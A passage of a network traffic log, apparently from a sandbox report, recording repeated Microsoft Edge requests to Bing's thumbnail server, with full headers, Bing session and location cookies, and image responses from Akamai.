cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1392
x-check-cacheable: YES
cache-control: public, max-age=487694
date: Thu, 17 Oct 2024 21:04:18 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b5128c
GET

https://th.bing.com/th?id=OIP.527_UBx_J5r-Z_D0sOr7xAHaFn&w=80&h=80&c=1&vt=10&bgcl=bcf0e4&r=0&o=6&pid=5.1

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OIP.527_UBx_J5r-Z_D0sOr7xAHaFn&w=80&h=80&c=1&vt=10&bgcl=bcf0e4&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3011
x-check-cacheable: YES
cache-control: public, max-age=2383962
date: Thu, 17 Oct 2024 21:04:18 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b51296
GET

https://th.bing.com/th?id=ODLS.5be76585-07ee-4d6b-8d21-0e70e3dff7cc&w=16&h=16&c=7&o=6&pid=1.7

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.5be76585-07ee-4d6b-8d21-0e70e3dff7cc&w=16&h=16&c=7&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 37666
x-check-cacheable: YES
cache-control: public, max-age=153891
date: Thu, 17 Oct 2024 21:04:18 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b51297
GET

https://th.bing.com/th?id=ODLS.112859d1-6d69-4703-8442-728a546ab4f4&w=16&h=16&c=7&o=6&pid=1.7

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.112859d1-6d69-4703-8442-728a546ab4f4&w=16&h=16&c=7&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1098
x-check-cacheable: YES
cache-control: public, max-age=1379770
date: Thu, 17 Oct 2024 21:04:18 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b51263
GET

https://th.bing.com/th?id=ODLS.360b16ff-5978-40e3-9c67-ff327e5ca418&w=32&h=32&qlt=97&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.360b16ff-5978-40e3-9c67-ff327e5ca418&w=32&h=32&qlt=97&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1148
cache-control: public, max-age=1209541
date: Thu, 17 Oct 2024 21:04:18 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b51289
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OIP.5aDiscebQgPfvKR9LaeCGAHaE7&w=80&h=80&c=1&vt=10&bgcl=c03714&r=0&o=6&pid=5.1

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=OIP.5aDiscebQgPfvKR9LaeCGAHaE7&w=80&h=80&c=1&vt=10&bgcl=c03714&r=0&o=6&pid=5.1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1688
cache-control: public, max-age=1209600
date: Thu, 17 Oct 2024 21:04:18 GMT
x-cache: TCP_MISS from a92-123-119-182.deploy.akamaitechnologies.com (AkamaiGHost/11.6.5-0c617a4be13e71cac2c90d10d87ecf54) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.b6777b5c.1729199058.9b51290
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.34827b78-0d1b-43ad-9aac-ade7717dedc6&w=32&h=32&qlt=98&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

92.123.128.178:443

Request

GET /th?id=ODLS.34827b78-0d1b-43ad-9aac-ade7717dedc6&w=32&h=32&qlt=98&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
